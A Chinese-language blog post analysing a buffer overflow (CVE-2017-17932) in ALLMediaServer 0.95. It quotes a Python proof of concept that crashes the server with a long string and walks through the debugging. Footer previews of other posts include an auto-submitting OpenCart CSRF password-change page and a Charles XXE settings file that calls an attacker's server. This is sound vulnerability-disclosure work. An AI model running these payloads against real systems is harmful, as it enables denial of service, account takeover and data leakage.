[CVE-2017-17932] ALLMediaServer 0.95 远程溢出漏洞分析

0x00 参考

   https://www.exploit-db.com/exploits/43406/

    # Exploit Title: Buffer  overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service
 
 
 
  
#1. Description
#
#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
#
#  
#2. Proof of Concept
#
  
 
#!/usr/bin/python
 
#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.
 
def main():
 
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
   s.connect(('192.168.205.131', 888))
 
   buffer = "A" * 3000
 
 
   s.send(buffer)
 
   s.close()
 
 
if __name__ == '__main__':
   import socket
 
   main()

将192.168.205.131改为自己的ip


0x01 漏洞分析

复现环境(windows10,python2.7.0)

启动ALLMediaServer,用调试器附加MediaServer.exe,用poc向127.0.0.1:888发送TCP请求,触发漏洞(MediaServer.exe崩溃)


可以看出当前栈被0x41覆盖了

根据崩溃的那个点buf = 0534F910(这个值会变化的)找到触发漏洞地方

发送第一次请求

buf里的内容,并没有溢出,只是服务端初始化了一些数据

先对这个地址下硬件断点,再发第2次请求,这是会断到某个位置(accept函数里)

一直单步,来到接收数据那块地方

步入

可以看到接收到的数据,全部读取到buf里,造成了溢出

评论

发表评论

此博客中的热门博文

Docker's latest version of privilege escalation vulnerability

图片
0x00 Vulnerability analysis 1.com.docker.vmnetd is a launch service that runs at root authority; communicates with the client (Docker) through a local socket; after analysis, it is found that the client is not verified during the communication process, resulting in the risk of elevated permissions 2. The two main functions in main_handle are vmnet_handshake_Perform and vmnetd_commands_Handle; vmnet_handshake_Perform function mainly initializes the message and obtains the corresponding client command. vmnetd_commands_Handle function calls the corresponding callback function according to the obtained command 2.1 vmnet_handshake_Perform 2.1.1 First obtain the initialization message (3 packets) requested by the client through vmnet_handshake_readInitMessage. The message structure is as follows packet-1: flag c00009a318  56 4d 4e 33 54 00 00 00 00 00 00 00 00 00 00 00  VMN3T........... c00009a328  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...
阅读全文

Opencart-v3-0-3-0 user changes password at csrf vulnerability

图片
Software Link: https://github.com/opencart/opencart/ Date: 06.28.2018 Exploit Author:CK01 Version:<= V3-0-3-0 0x00 Vulnerability analysis       The user token was not verified at the password change, causing the csrf vulnerability to modify the user password  /upload/catalog/controller/account/password.php 0x01 Exploit Save the following exp as html and open the run <html>   <body>     <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">   <input type="hidden" name="password" value="CK01ck01" />       <input type="hidden" name="confirm" value="CK01ck01" /> <script>         document.getElementById('post123').submit();  </script>     </form>   </body> </html>...
阅读全文

Charles 4.2.7 XML External Entity

图片
Software Link: https://www.charlesproxy.com Date:11.12.2018 Exploit Author:CK01 Version:<=4.2.7 Security Issue: The XML External Entity vulnerability exists in the Charles import/export setup option. If the user imports the "Charles Settings.xml" of the attacker, the internal network may be detected and the information may be leaked. POC: 1.Charles Setting.xml:(127.0.0.1 -> attacker's server ) <?xml version='1.0' encoding='UTF-8' ?> <?charles serialisation-version='2.0' ?> <!DOCTYPE data [ <!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]> <charles-export> <proxyConfiguration> <enableSOCKSProxy>false</enableSOCKSProxy> <dynamicHTTPPort>false</dynamicHTTPPort> <dynamicSOCKSPort>false</dynamicSOCKSPort> <enableSOCKSTransparentHTTPProxying>true</enableSOCKSTransparentHTTPProxying> <port>8888</port...
阅读全文